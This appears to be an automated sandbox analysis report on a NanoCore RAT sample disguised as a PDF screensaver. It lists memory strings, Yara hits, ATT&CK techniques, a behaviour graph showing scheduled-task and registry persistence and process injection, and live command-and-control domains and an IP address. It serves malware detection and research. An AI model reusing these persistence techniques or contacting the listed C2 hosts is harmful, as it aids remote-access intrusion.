      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      2
      Valid Accounts      		111
      Scripting      		1
      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		11
      Disable or Modify Tools      		31
      Input Capture      		2
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Native API      		2
      Valid Accounts      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol31
      Input Capture      		Exfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts2
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		2
      Valid Accounts      		111
      Scripting      		Security Account Manager4
      File and Directory Discovery      		SMB/Windows Admin Shares2
      Clipboard Data      		Automated Exfiltration1
      Non-Standard Port      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		21
      Registry Run Keys / Startup Folder      		21
      Access Token Manipulation      		12
      Obfuscated Files or Information      		NTDS36
      System Information Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Data Encoding      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script312
      Process Injection      		12
      Software Packing      		LSA Secrets341
      Security Software Discovery      		SSHKeyloggingData Transfer Size Limits1
      Remote Access Software      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.common1
      Scheduled Task/Job      		1
      DLL Side-Loading      		Cached Domain Credentials121
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 Channel1
      Non-Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup Items21
      Registry Run Keys / Startup Folder      		12
      Masquerading      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative Protocol21
      Application Layer Protocol      		Rogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
      Valid Accounts      		Proc Filesystem11
      Application Window Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)121
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)21
      Access Token Manipulation      		Network Sniffing1
      Remote System Discovery      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron312
      Process Injection      		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
      Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
      Hidden Files and Directories      		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 796783 Sample: 026910003102350.pdf.scr.exe Startdate: 02/02/2023 Architecture: WINDOWS Score: 100 73 Multi AV Scanner detection for domain / URL 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 12 other signatures 2->79 10 026910003102350.pdf.scr.exe 39 2->10         started        14 itugx.exe 2 2->14         started        16 wscript.exe 1 2->16         started        18 7 other processes 2->18 process3 file4 59 C:\Users\user\AppData\Local\...\itugx.exe, PE32 10->59 dropped 89 Starts an encoded Visual Basic Script (VBE) 10->89 20 wscript.exe 1 10->20         started        91 Creates autostart registry keys with suspicious values (likely registry only malware) 14->91 93 Creates multiple autostart registry keys 14->93 22 RegSvcs.exe 14->22         started        24 itugx.exe 16->24         started        26 itugx.exe 18->26         started        28 itugx.exe 18->28         started        30 conhost.exe 18->30         started        32 4 other processes 18->32 signatures5 process6 process7 34 itugx.exe 2 4 20->34         started        38 RegSvcs.exe 24->38         started        40 RegSvcs.exe 26->40         started        42 RegSvcs.exe 28->42         started        file8 57 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 34->57 dropped 81 Antivirus detection for dropped file 34->81 83 Multi AV Scanner detection for dropped file 34->83 85 Found API chain indicative of sandbox detection 34->85 87 3 other signatures 34->87 44 RegSvcs.exe 1 11 34->44         started        signatures9 process10 dnsIp11 67 december2n.duckdns.org 212.193.30.230, 60705 SPD-NETTR Russian Federation 44->67 69 december2nd.ddns.net 44->69 71 192.168.2.1 unknown unknown 44->71 61 C:\Program Files (x86)\...\dhcpmon.exe, PE32 44->61 dropped 63 C:\Users\user\AppData\Roaming\...\run.dat, data 44->63 dropped 65 C:\Users\user\AppData\Local\...\tmp897A.tmp, XML 44->65 dropped 95 Protects its processes via BreakOnTermination flag 44->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 44->97 99 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->99 49 schtasks.exe 1 44->49         started        51 schtasks.exe 1 44->51         started        file12 signatures13 process14 process15 53 conhost.exe 49->53         started        55 conhost.exe 51->55         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      026910003102350.pdf.scr.exe46%ReversingLabsWin32.Trojan.Lisk
      026910003102350.pdf.scr.exe46%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe100%AviraDR/AutoIt.Gen
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe46%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      3.2.RegSvcs.exe.60b0000.7.unpack100%AviraTR/NanoCore.fadteDownload File
      19.2.RegSvcs.exe.d00000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      SourceDetectionScannerLabelLink
      december2nd.ddns.net12%VirustotalBrowse
      december2n.duckdns.org6%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      december2nd.ddns.net12%VirustotalBrowse
      december2n.duckdns.org6%VirustotalBrowse
      december2n.duckdns.org100%Avira URL Cloudmalware
      december2nd.ddns.net100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      		212.193.30.230
      		truetrueunknown
      december2n.duckdns.org
      		212.193.30.230
      		truetrueunknown

      Contacted URLs

